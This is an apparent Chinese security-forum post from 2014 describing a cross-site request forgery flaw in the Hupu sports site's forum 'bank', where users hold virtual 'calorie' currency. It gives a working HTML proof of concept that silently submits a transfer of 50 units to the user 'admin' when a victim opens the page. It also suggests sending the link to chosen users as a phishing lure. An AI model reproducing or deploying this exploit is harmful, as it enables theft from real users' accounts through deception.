虎扑体育网某功能存在csrf可转账论坛虚拟币下载

来源:黑吧安全网 浏览:942次 时间:2014-04-30
做网站找雨过天晴工作室

虎扑有个银行功能, 存款单位为卡路里
这次试了一下

 
抓包看到过程

没有token, refer去掉后也依旧转帐成功, 证明存在CSRF可能性
 
1. 利用xss.js中的代码,在服务器上建立一个html页面
 
?
1
2
3
4
5
6
<html>
    <script src="xss.js"></script>
    <script>
        xss.csrf(url="http://my.hupu.com/bank_act.php", {"action": "virement", "pwuser": "admin", "to_money": "50", "content_plus": "csrf"});
    </script>
</html>
 

2. 用户点击后就会自动给admin用户转帐50卡路里
 
 
 
3. 利用方面主要依赖钓鱼技巧,给特定用户发链接钓其中招